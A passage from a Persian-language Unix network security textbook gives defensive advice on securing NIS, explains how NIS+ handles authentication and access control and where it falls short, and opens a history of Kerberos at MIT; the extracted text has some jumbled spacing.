ﭘﺎﻳﻪﺭﻳﺰﻱ ﺷﺪﻩ ﺍﺳﺖ ،ﭘﻮﺭﺕ ﻭﺍﻗﻌﻲ UDPﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ،ﻳﻚ ﭘـﻮﺭﺕ ﺛﺎﺑـﺖ ﻭ ﻣـﺸﺨﺺ ﻧﻴـﺴﺖ .ﺩﺭ ﻋﻤـﻞ ،ﺗﻨﻬـﺎ
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻦ ،ﺳﺪ ﻛﺮﺩﻥ ﺭﺍﻩ ﻫﻤﺔ ﺑﺴﺘﻪﻫﺎﻱ UDPﺍﺳﺖ ،ﺑﺠﺰ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﺧﻮﺩﺗﺎﻥ ﺑﺼﻮﺭﺕ ﺧﺎﺹ ﺍﺟﺎﺯﻩ ﺗﺒﺎﺩﻝ ﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺩﻫﻴﺪ.
ﻧﺴﺨﻪﺍﻱ ﺍﺯ portmapperﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ )ﺑـﺮ ﺍﺳـﺎﺱ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﻳـﺎ ﺁﺩﺭﺱ (IPﻛـﻪ .٢
ﺩﺳﺘﺮﺳﻲ ﺁﻧﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﺎﺹ RPCﺑﺎﻳﺪ ﺗﺄﻳﻴﺪ ﻳﺎ ﺭﺩ ﺷﻮﺩ ﺗﻬﻴﻪ ﻛﻨﺪ .ﺍﮔﺮ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﻧﺪﺍﺭﻳـﺪ ﻣﻬـﺎﺟﻢ ﻫﻤﭽﻨـﺎﻥ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ،portmapperﻭﺟﻮﺩ ﻫﺮﻳﻚ ﺍﺯ ﺧﺪﻣﺎﺕ RPCﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ ،ﺍﻣﺎ ﺍﮔﺮ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ RPCﺍﺑﺘـﺪﺍ
ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ portmapperﺗﻼﺵ ﻛﻨﻨﺪ ،ﻳﻚ ﻧﺴﺨﺔ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﺔ NISﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺯﻣﻴﻨﺔ ﻭﻗﻮﻉ ﻳـﻚ ﺣﻤﻠـﺔ ﺑـﺎﻟﻘﻮﻩ
ﻫﺸﺪﺍﺭ ﺩﻫﺪ.
ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ NISﺷﻤﺎ ﺍﺯ ﻓﺎﻳﻞ /var/yp/securenetsﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NISﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ .ﺍﮔﺮ ﺍﻳـﻦ ﻓﺎﻳـﻞ .٣
ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ NISﺭﺍ ﺩﺍﺭﻧﺪ ﻣﺸﺨﺺ ﻛﻨﺪ .ﻧﮕﺎﺭﺷـﻬﺎﻱ ﺩﻳﮕـﺮ
ﻻ ﺑﺮﺍﻱ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﺁﺩﺭﺳﻬﺎﻳﻲ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺧـﺎﺹ RPCﺗﻮﺳـﻂ ypserveﻣﺠـﺎﺯ NISﺍﺣﺘﻤﺎ ﹰ
ﺍﺳﺖ ،ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ.
ﺁﻧﻘﺪﺭ ﺍﺯ NISﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ﻛﻪ DNSﺍﺯ ﻳﺎﺩﺗﺎﻥ ﺑﺮﻭﺩ! ﺍﮔﺮ ﺑﻨﺎﻱ ﺷﻤﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛـﺴﻲ ﺍﺯ ﺑﻴـﺮﻭﻥ ﻧﺘﻮﺍﻧـﺪ ﺁﺩﺭﺳـﻬﺎﻱ IPﺍﺩﺍﺭﺓ .٤
ﺷﻤﺎ ﺭﺍ ﺑﻔﻬﻤﺪ ،ﺩﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ١٦٢ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ -ﻳﻜﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺍﺧﻠﻲ ﻭ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺧﺎﺭﺟﻲ.
NIS+ﺷﺮﻛﺖ Sun
NISﺑﺮﺍﻱ ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﺳﺘﺎﻧﻪ ﻭ ﻛﻮﭼﻚ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑـﻮﺩ .ﻭﻗﺘـﻲ ﻣـﺸﺘﺮﻳﺎﻥ ﺷـﺮﻛﺖ Sun Microsystemsﺷـﺮﻭﻉ ﺑـﻪ
ﺳﺎﺧﺖ ﺷﺒﻜﻪﻫﺎﻳﻲ ﺑﺎ ﻫﺰﺍﺭﺍﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺮﺩﻧﺪ ،ﻣﻌﻠﻮﻡ ﺷﺪ NISﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺷﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ ﻏﻴﺮﻛـﺎﺭﺑﺮﺩﻱ ﻭ ﻧـﺎﺍﻣﻦ ﺍﺳـﺖ .ﺩﺭ
ﺳﺎﻝ ۱۹۹۰ﺷﺮﻛﺖ Sun Microsystemsﺗﻬﻴﺔ ﻳﻚ NISﺟﺎﻳﮕﺰﻳﻦ ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ ﻭ ﭼﻨﺪ ﺳـﺎﻝ ﺑﻌـﺪ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﺗﺤـﺖ ﻋﻨـﻮﺍﻥ
NIS+ﻋﺮﺿﻪ ﺷﺪ.
NIS+ﺑﺴﺮﻋﺖ ﺑﻪ ﺧﺮﺍﺏ ﺑﻮﺩﻥ ﺷﻬﺮﺕ ﻳﺎﻓﺖ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﻪ ﺁﻥ ﻋﻤ ﹰ
ﻼ ﻣﻮﺭﺩ ﺁﺯﻣﻮﻥ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘـﻪ ﺑﻮﺩﻧـﺪ ،ﭼﺮﺍﻛـﻪ ﺑـﻪ
ﻧﺪﺭﺕ ﻃﺒﻖ ﺁﻧﭽﻪ ﻛﻪ ﻗﺮﺍﺭ ﺑﻮﺩ ﻋﻤﻞ ﻣﻲﻛﺮﺩﻧﺪ .ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ،ﺳﻨﺪﺑﺮﺩﺍﺭﻱ ﺁﻥ ﺑﺴﻴﺎﺭ ﮔﻴﺞﻛﻨﻨﺪﻩ ﻭ ﻧﺎﻗﺺ ﺑـﻮﺩ .ﺩﺭ ﻧﻬﺎﻳـﺖ Sunﻧﻘـﺎﻳﺺ
ﺁﻧﺮﺍ ﺭﻓﻊ ﻛﺮﺩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﻣﺮﻭﺯ NIS+ﻳﻚ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥﺗﺮ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻭ ﻛﻨﺘﺮﻝ ﺍﻳﻤﻦ ﺷﺒﻜﻪ ﺍﺳﺖ .ﻳﻚ ﻣﺮﺟـﻊ ﻋـﺎﻟﻲ ﺑـﺮﺍﻱ
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ NIS+ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻛﺘﺎﺏ ﻫﻤﻪ ﭼﻴﺰ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻫﺒﺮﻱ ١٦٣NIS+ﻧﻮﺷﺘﻪ ﺭﻳﻚ ﺭﻣﺰﻱ ١٦٤ﺍﺳﺖ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ NIS+
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ NIS+ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺭﺿﺎﻳﺘﺒﺨﺶ ﺑﺎﺷﺪ .ﻭﻗﺘﻲ ﻳﻚ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﻲﺷﻮﺩ ،ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺼﻮﺭﺕ
ﺧﻮﺩﻛﺎﺭ ﺍﺳﺘﻮﺍﺭﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ NIS+ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻩ ،ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺁﻥ ﺭﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ.
ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭﺍﺭﺩﺷﺪﻩ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ NIS+ﻳﻜﺴﺎﻥ ﺑﺎﺷﻨﺪ )ﻛﻪ ﻣﻌﻤﻮ ﹰﻻ ﭼﻨﻴﻦ ﺍﺳﺖ( ﺭﻭﻧﺪ keyservﻣﺮﺑﻮﻁ ﺑـﻪ NIS+ﻛﻠﻴـﺪ
ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮ ﺭﺍ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﮕﻪ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺎﺭﺑﺮ ﺑﻪ ﻫﻤﺔ ﺧﺪﻣﺎﺕ Secure RPCﺩﺳﺘﺮﺳﻲ ﺷﺒﻪ ﻣﺴﺘﻘﻴﻢ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ
)ﺑﻌﺒﺎﺭﺕ ﺩﻳﮕﺮ ﻻﻳﺔ ﻣﻴﺎﻧﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻧﺎﻣﺮﺋﻲ ﻣﻲﺷﻮﺩ( .ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭﺍﺭﺩﺷﺪﻩ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ NIS+ﻳﻜـﺴﺎﻥ ﻧﺒﺎﺷـﻨﺪ ،ﺁﻧﮕـﺎﻩ ﻛـﺎﺭﺑﺮ
ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ keyloginﻭﺍﺭﺩ ﺩﺍﻣﻨـﻪ NIS+ﺷـﻮﺩ .ﻛـﺎﺭﺑﺮﺍﻥ NIS+ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﻓﺮﻣـﺎﻥ
nispasswdﻋﻮﺽ ﻣﻲﻛﻨﻨﺪ ،ﻛﻪ ﺑﺴﻴﺎﺭ ﻣﺸﺎﺑﻪ ﻓﺮﻣﺎﻥ Unix passwdﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻛﺎﺭ ﻣﻲﻛﻨﺪ.
ﻞ ﺍﻣﻨﻴﺖ NIS+ﺑﺎ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻥ ﻳﻚ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ ،ﻭ ﺑﺎ ﺍﻳﺠﺎﺩ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘـﺮ ﹺ
ﻝ ﺩﺳﺘﺮﺳـﻲ ﻛـﻪ ﺭﺍﻫﻬـﺎﻱ ﺗﻌﺎﻣـ ﹺ
ﻛﺎﺭﺑﺮﺍﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺟﺪﺍﻭﻝ NIS+ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻲﺷﻮﺩ NIS+ .ﺩﻭ ﻧﻮﻉ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ :ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺤﻠﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﺟﺮﺍﻱ ﻳﻚ ﻓﺮﻣﺎﻥ NIS+ﺗﻮﺳﻂ UIDﺍﺳﺖ ﻭ ﺑﺼﻮﺭﺕ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﻱ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﺻﻠﻲ NIS+ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ DESﻧﻴﺰ ﺑﺮ ﻣﺒﻨﺎﻱ Secure RPCﺍﺳﺖ.
ﻫﺮ ﺷﻲﺀ NIS+ﻳﻚ "ﻣﺎﻟﻚ" ﺩﺍﺭﺩ ،ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﻻ ﻫﻤﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪﺓ ﺁﻥ ﻣﻲﺑﺎﺷﺪ )ﻣﺎﻟﻚ ﻳﻚ ﺷﻲﺀ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑـﺎ ﻓﺮﻣـﺎﻥ nischownﺗﻐﻴﻴـﺮ ﺩﺍﺩ(.
ﺍﺷﻴﺎﻱ NIS+ﻫﻤﭽﻨﻴﻦ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﻣﻮﻛﻞ ﺩﺍﺭﺍﻱ ﭼﻪ ﻧـﻮﻋﻲ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ
ﺑﻪ ﺷﻲﺀ ﺍﺳﺖ -ﺧﻮﺍﻧﺪﻥ ،ﺗﻐﻴﻴﺮ ،ﺍﻳﺠﺎﺩ ،ﺣﺬﻑ ،ﻳﺎ ﺍﺩﻏﺎﻡ -ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﭼﻬﺎﺭ ﻧﻮﻉ ﻣﻮﻛﻞ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺷﻲﺀ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ:
ﻫﻴﭽﻜﺲ )ﺗﻘﺎﺿﺎﻫﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻧﺸﺪﻩ( ،ﻣﺎﻟﻚ ﺷﻲﺀ ،ﻣﻮﻛﻼﻧﻲ ﻛﻪ ﺑﺎ ﺷﻲﺀ ﺩﺭ ﻳﻚ ﮔﺮﻭﻩ ﻫﺴﺘﻨﺪ ،ﻭ ﻣﻮﻛﻼﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﺓ ﺩﻳﮕﺮ.
ﺟﺪﺍﻭﻝ NIS+ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺭﺩﻳﻔﻬﺎ ،ﺳﺘﻮﻧﻬﺎ ،ﻳﺎ ﺍﻗﻼﻡ ﺩﺍﺩﻩﺍﻱ ﻣﻨﻔﺮﺩ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮ ﺑﺪﻫﻨـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻫﻤـﺔ
ﻛﺎﺭﺑﺮﺍﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﻪ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﻳﻚ ﺟﺪﻭﻝ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﻫﺮ ﻛﺎﺭﺑﺮ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧـﺪ ﺁﻥ ﺳـﻄﺮ ﺍﺯ ﺟـﺪﻭﻝ ﺭﺍ
ﻛﻪ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺍﻭ ﻣﺮﺑﻮﻁ ﺍﺳﺖ ﺗﻐﻴﻴﺮ ﺩﻫﺪ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﺯ ﺁﻧﺠﺎ ﻛـﻪ ﺩﺳﺘﺮﺳـﻴﻬﺎﻱ ﺭﺩﻳﻔﻬـﺎ ،ﺳـﺘﻮﻧﻬﺎ ،ﻭ ﺍﻗـﻼﻡ ﺩﺍﺩﻩﺍﻱ
ﻣﻨﻔﺮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺑﺰﺭﮔﺘﺮ ﻛﻨﻨﺪ ،ﻗﻮﺍﻧﻴﻦ ﻣﺤﺪﻭﺩﻛﻨﻨﺪﺓ ﺑﻴﺸﺘﺮ ،ﻗﺎﺑﻞ ﺍﻋﻤﺎﻝ ﻧﻤﻲﺑﺎﺷﻨﺪ.
ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ NIS+
ﺍﮔﺮ NIS+ﺩﺭﺳﺖ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﺷﺒﻜﻪ ﺳﻴﺴﺘﻢ ﺑﺴﻴﺎﺭ ﺍﻣﻨﻲ ﺑﺎﺷﺪ .ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ ،ﻣﺜـﻞ ﻫﻤـﺔ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻳﺎ ﻣﺪﻳﺮﻳﺖ NIS+ﺍﺷﺘﺒﺎﻫﻲ ﺭﺥ ﺩﻫﺪ ﻛﻪ ﻧﺘﻴﺠﺔ ﺁﻥ ﺑﺮ ﺷﺒﻜﻪﺍﻱ ﻛﻪ NIS+
ﻼ ﻣﺴﺎﺋﻠﻲ ﺑﺮﺍﻱ ﺁﮔﺎﻫﻲ ﺫﻛﺮ ﻣﻲﺷﻮﺩ:
ﺍﺯ ﺁﻥ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻦ ﺍﻳﻤﻨﻲ ﺑﺎﺷﺪ .ﺫﻳ ﹰ
ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺍﺷﻴﺎﻱ NIS+ﺭﺍ ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ
ﻫﻨﻮﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺮﺭﺳﻲ ﺟﺎﻣﻌﻴﺖ NIS+ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ،ﺑﻨﺎﺑﺮﺍﻳﻦ ﺟﺪﻭﻟﻬﺎﻱ ،NIS+ﺩﺍﻳﺮﻛﺘـﻮﺭﻱﻫـﺎ ،ﻭ ﮔﺮﻭﻫﻬـﺎ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﺩﺳـﺘﻲ ﻭ ﺩﺭ
ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﺷﻮﻧﺪ .ﺩﺭ ﻣﻮﺭﺩ ﺍﺷﻴﺎﻳﻲ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻫﻴﭻ ﻳﺎ ﻫﻤﻪ ﻛﺲ ﺍﺟﺎﺯﻩ ﺗﻐﻴﻴﺮ ﺩﺍﺭﻧـﺪ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺟـﺪﺍﻭﻟﻲ ﻛـﻪ ﺍﻳـﻦ ﺩﻭ
ﻃﺒﻘﻪ ﺍﺯ ﻣﻮﻛﻼﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺍﺷﻴﺎﻱ ﺟﺪﻳﺪ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ ﻣﺮﺍﻗﺒﺖ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ.
Kerberos
ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ۱۹۸۰ﺩﺭ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﻣﺎﺳﺎﭼﻮﺳﺖ ) ١٧١(MITﺻﺪﻫﺎ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻗﻮﻱ ﺑﻪ ﻫﻤﺮﺍﻩ ﻧﻤﺎﻳﺸﮕﺮﻫﺎﻱ ﺑﺰﺭﮒ ،ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ
١٧٢
ﺳﺮﻳﻊ )ﺩﺭ ﺁﻧﺰﻣﺎﻥ( ،ﺩﻳﺴﻜﻬﺎﻱ ﻛﻮﭼﻚ ،ﻭ ﺭﺍﺑﻂﻫﺎﻱ ،Ethernetﺟﺎﻳﮕﺰﻳﻦ ﺳﻴﺴﺘﻢ ﻗﺪﻳﻤﻲﺗﺮ ﻛﻪ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎ ﻭ ﭼﻨﺪ ﺭﺍﻳﺎﻧﺔ ﺯﻣﺎﻥﻣﺸﺘﺮﻙ
ﺗﺸﻜﻴﻞ ﻳﺎﻓﺘﻪﺑﻮﺩ ﺷﺪ .ﻫﺪﻑ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮﻳﻚ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﻭ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺍﻳﺴﺘﮕﺎﻩﻫﺎﻱ ﻛﺎﺭﻱ ﺷﺮﻭﻉ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻛﺮﺩﻧﺪ ،ﻣﺸﻜﻞ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺷﺒﻜﻪ ﺑﻪ ﻃـﻮﺭ ﺁﺯﺍﺭﺩﻫﻨـﺪﻩﺍﻱ ﺁﺷـﻜﺎﺭ ﺷـﺪ .ﭼـﻮﻥ ﺍﺯ
ﻫﻤﻪﺟﺎ ﻣﻲﺷﺪ ﺑﻪ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺖ ،ﻫﻴﭻ ﭼﻴﺰﻱ ﻣﺎﻧﻊ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ )ﻳﺎ ﻣﻬﺎﺟﻤﻴﻦ ﺧﺎﺭﺝ ﻣﺆﺳﺴﻪ( ﻧﻤﻲﺷﺪ ﻛﻪ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺟﺎﺳﻮﺳـﻲ
ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨﺪ .ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮﻣﻤﻜﻦ ﺑﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻥ ﺍﺯ ﺍﻓﺸﺎ ﺷﺪﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺗﻮﺳﻂ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻳﺎ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ
ﻣﺠﺪﺩ ﺁﻧﻬﺎ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻱ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ .ﭼﻴﺰﻱ ﻛﻪ ﻣﺸﻜﻼﺕ ﺭﺍ ﭘﻴﭽﻴﺪﻩﺗﺮ ﻣﻲﻛﺮﺩ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﺼﻞ ﺑـﻪ
ﺷﺒﻜﻪ ،ﺭﺍﻳﺎﻧﻪﻫﺎﻱ IBM PC/ATﺑﻮﺩﻧﺪ ﻭ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﻛﻪ ﺣﺘﻲ ﺍﺯ ﻣﻘﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻢ ﺑﻲﺑﻬﺮﻩ ﺑـﻮﺩ .ﻛـﺎﺭﻱ ﺑﺎﻳـﺪ
